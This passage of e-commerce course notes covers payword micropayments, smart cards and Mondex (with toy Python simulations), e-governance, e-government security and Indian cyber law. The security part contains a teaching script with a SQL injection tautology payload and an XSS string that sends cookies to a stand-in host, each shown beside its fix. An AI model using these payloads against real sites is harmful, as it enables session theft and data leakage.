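    return h == commitment


def demo() -> tuple[bool, bool, bool, bool, int]:
    """Five 1-cent payments, a forged payword, a replayed payword, then settlement."""
    wallet = UserWallet(length=100)
    vendor = Vendor(wallet.commitment())
    ok = all(vendor.accept(*wallet.next_payword()) for _ in range(5))
    forged = vendor.accept(6, secrets.token_bytes(32))          # random bytes, not on the chain
    replay = vendor.accept(3, wallet._chain[wallet.length - 3])  # w_3 presented again
    count, last = vendor.redeem_claim()
    settled = broker_verify(wallet.commitment(), count, last)
    return ok, forged, replay, settled, count


if __name__ == "__main__":
    print(demo())   # (True, False, False, True, 5)
```

Per-payment cost is one hash on the vendor side and zero network round trips to the broker, which is what makes fractions-of-a-cent pricing workable; the trust question the next section raises is pushed to the single commitment, which is the only item that needs a signature.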

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits on the customer side of using micropayments are speed and flexibility. On the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small amounts, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below:

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment the customer receives access to the purchased product.

Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and Mastercard SecureCode™).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing.[2] Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input, which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with a microchip embedded on it

Two types:

Memory-only chips

Microprocessor chips

Can hold up to 32,000 bytes

Newer smart cards have math co-processors

Perform complex encryption routines quickly

In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards –


Why Smart Cards –

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages –

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications –

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication, ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER –

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT –

Reliable offline payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION –

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:

o Limits for collecting personal information

o Limits for using, disclosing and keeping personal information

o Keeping personal information accurate

o Safeguarding personal information

Limits for collecting personal information:

o loads from account

o deposits into account

o lost transactions

Limits for using, disclosing and keeping personal information:

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate:

o load and unload are online

o a rolling log of 10 transactions provides the exact spend and retailer name

Safeguarding personal information:

o firewalls in Multos - between applications - ITSEC 6 designation

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
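The offline card-to-card transfer described above, together with the rolling log of 10 transactions listed under privacy and the overflow problem the critics raise, can be modelled in a few lines. The following is an added example, not Mondex's own protocol or code: two toy purses exchange authenticated value-transfer messages while offline, each keeping only the last 10 log entries, so that the entries lost before a bank upload can be counted. Assumptions (not from the notes): transfer messages are authenticated with an HMAC under a key shared by all purses of one issuer, a constructed stand-in for the secret held in the tamper-resistant chip (a real system uses per-card keys and signatures); the receiving purse records (payer, sequence number) pairs so the same transfer cannot be credited twice; amounts are in pence and all values are constructed.

```python
"""Added example: toy offline purses with authenticated card-to-card transfer,
replay rejection, and the rolling 10-entry log whose overflow loses audit data.
Not Mondex's code; the shared HMAC key is a constructed stand-in for the chip secret."""
from __future__ import annotations

import hashlib
import hmac
from collections import deque

LOG_SIZE = 10   # "rolling 10 transactions" as stated in the notes


class Purse:
    def __init__(self, card_id: str, balance: int, key: bytes):
        self.card_id = card_id
        self.balance = balance
        self._key = key
        self.log: deque = deque(maxlen=LOG_SIZE)   # oldest entry is silently dropped
        self._seq = 0
        self._seen: set[tuple[str, int]] = set()   # (payer, seq) already credited

    def _mac(self, payload: str) -> str:
        return hmac.new(self._key, payload.encode(), hashlib.sha256).hexdigest()

    def pay(self, payee_id: str, amount: int, retailer: str) -> dict:
        """Build an authenticated transfer message; value leaves this purse immediately.

        If the message never reaches the payee, the value is gone from both cards:
        this is the "lost transactions" case the privacy list mentions.
        """
        if amount <= 0 or amount > self.balance:
            raise ValueError("amount exceeds card balance")
        self._seq += 1
        payload = f"{self.card_id}:{payee_id}:{self._seq}:{amount}"
        self.balance -= amount
        self.log.append({"seq": self._seq, "to": payee_id, "amount": amount, "retailer": retailer})
        return {"payload": payload, "mac": self._mac(payload)}

    def receive(self, msg: dict) -> bool:
        """Credit value only if the MAC verifies, the message is for this card, and it is new."""
        if not hmac.compare_digest(self._mac(msg["payload"]), msg["mac"]):
            return False                            # forged or altered message
        payer, payee, seq, amount = msg["payload"].split(":")
        if payee != self.card_id or (payer, int(seq)) in self._seen:
            return False                            # misdirected, or a replay
        self._seen.add((payer, int(seq)))
        self.balance += int(amount)
        self.log.append({"seq": int(seq), "from": payer, "amount": int(amount)})
        return True


def demo() -> tuple[int, int, int, bool, int, int]:
    """Twelve offline 100p purchases, one replay attempt, then count what a bank upload could recover.

    Returns (payer_balance, payee_balance, accepted, replay_accepted, retrievable, lost).
    """
    key = b"constructed-shared-purse-key"
    alice, shop = Purse("A1", 5000, key), Purse("S9", 0, key)
    msgs = [alice.pay("S9", 100, "Corner shop") for _ in range(12)]
    accepted = sum(shop.receive(m) for m in msgs)
    replayed = shop.receive(msgs[-1])        # the same transfer presented a second time
    retrievable = len(alice.log)             # entries still on the card for the bank to read
    return alice.balance, shop.balance, accepted, replayed, retrievable, 12 - retrievable


if __name__ == "__main__":
    print(demo())   # (3800, 1200, 12, False, 10, 2)
```

The balances reconcile (5000 - 1200 = 3800) even though two of the twelve log entries are gone, which is exactly the critics' point: the value transfer itself is protected, but once the log wraps the bank can no longer reconstruct every transaction from the card, so fraud detection has to rely on whatever was uploaded before the overflow.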

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with the definition of e-governance, is that there is no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA - it is location transparent, language independent, implementation independent and Operating System independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community, the providers of goods and services, to interact seamlessly with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer, and like any organization it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases the satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and businesses via the Internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the provision of a public good or service by the latter

• Generally, but not always, involving:

  - Long-term contracts

  - User charges and/or payments flowing between the parties

  - Shared investments, but mainly private

  - Risk sharing by the parties

• Must be a partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal headroom

• As a way of financing the project

• Separate policy & regulation from operations

• Make the good or service available

• Pay for performance and output

• Introduce competition, for and in the market


The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time, money, expertise, people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)?

Facility non-compliance natural disaster budget deficit

Is there a need for a PublicPrivate Partnership


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

EconomicFinancial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand public and stakeholder

feedback and economics

Master ScheduleBudget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow

Procurement Approach

Sole source, RFP, low bid

Risk Allocation between Public and private Partners

Structuring of ContractRisks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all share broadly similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and is thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2 INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS;

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: the capability to prevent unauthorized access to information.

Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: the capability to prevent the person or system that took part in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

Protecting premises, equipment and systems software, including input-output units;

Protecting software applications used to process personal data;

Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks;

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data;

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Despite this, trusted security and privacy measures constitute a crucial success factor for e-Government that has not yet been adequately addressed: as the UN 2012 Survey shows, only 20 per cent of national portals clearly indicate the presence of security features. Europe is leading, with 44 per cent of countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Examples of cyber attack techniques include packet sniffing, probing, malware, attacks on the Internet infrastructure, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

Continually improve its control environment;

Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. One research study found 816 e-Government websites from 212 different countries that were vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. SQL injection lets an attacker read or modify the back-end database, compromising both confidentiality and data integrity, while XSS lets an attacker run script in other users' browsers, which may be exploited to steal users' sessions and information.
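As an added illustration (not part of the original notes or of the study cited above), the two flaws just named, each in a vulnerable form next to its hardened form. The script runs against an in-memory SQLite table whose rows, the attacker strings and the page template are all constructed here for the demonstration; it uses only the Python standard library.

```python
"""Added example (not from the original notes): SQL injection and XSS,
vulnerable and hardened, against a constructed in-memory SQLite table."""
import html
import sqlite3


def build_db():
    """Constructed sample data: a tiny citizen-records table with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (id INTEGER, name TEXT, tax_id TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)",
                     [(1, "Asha", "TX-001"), (2, "Ravi", "TX-002")])
    return conn


def lookup_vulnerable(conn, name):
    """String formatting splices attacker text into the SQL statement itself,
    so a quote in the input changes the query's structure."""
    sql = f"SELECT id, name, tax_id FROM citizens WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, name):
    """A bound parameter is always treated as data, never as SQL, whatever
    characters it contains."""
    sql = "SELECT id, name, tax_id FROM citizens WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def render_vulnerable(name):
    """Reflecting untrusted input unescaped sends any <script> to the browser."""
    return f"<p>Welcome, {name}</p>"


def render_hardened(name):
    """html.escape turns markup characters into entities before output, so the
    browser shows the text instead of executing it."""
    return f"<p>Welcome, {html.escape(name, quote=True)}</p>"


if __name__ == "__main__":
    conn = build_db()
    # Constructed attacker input: closes the quoted literal and adds OR '1'='1'
    payload = "x' OR '1'='1"
    print(lookup_vulnerable(conn, payload))   # every row in the table leaks
    print(lookup_hardened(conn, payload))     # no row has that literal name
    xss = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
    print(render_vulnerable(xss))             # script tag reaches the page
    print(render_hardened(xss))               # rendered as harmless text
```

The injection payload is the classic tautology: in the vulnerable query it yields `WHERE name = 'x' OR '1'='1'`, which matches every row; with a bound parameter the database looks for a citizen literally named `x' OR '1'='1` and finds none. The same discipline (separate data from code; encode on output for the context it lands in) is what removes both classes of flaw.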

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. 'Offence' is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber crime is a term used broadly to describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening e-mail, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase in the year reported.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act, 2000.

Phishing

Phishing is just one of the many frauds on the Internet that try to fool people into parting with their money. Phishing refers to the receipt of unsolicited e-mails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some pretended reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber stalking is the use of the Internet or other electronic means to stalk someone. The term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base (India)

121 million Internet users

65 million active Internet users, up 28% from 51 million in 2010

50 million users shop online on e-commerce and online shopping sites

46+ million social network users

346 million mobile users had subscribed to data packages


CYBER LAW

Section 66 as originally enacted in the IT Act, 2000 defined hacking:

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43 (penalty for damage to a computer, computer system, etc.)

Whoever, without permission of the owner of the computer:

Secures access;

Downloads, copies or extracts any data, computer database or any information;

Introduces or causes to be introduced any virus or contaminant;

Disrupts or causes disruption;

Denies or causes denial of access to any person;

Provides any assistance to any person to facilitate access;

Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

Destroys, deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means;

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 66 after the 2008 amendment: "If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

(a) any information that is grossly offensive or has menacing character; or

(b) any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device; or

(c) any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. The Act has been opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act, 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce prepared by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN resolution, India passed the Information Technology Act, 2000 in May 2000, and it came into force on October 17, 2000. The Information Technology Act, 2000 has been substantially amended through the Information Technology (Amendment) Act, 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act gives additional focus to information security: it added several new sections on offences, including cyber terrorism and data protection. A set of Rules relating to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act, 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act, 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences

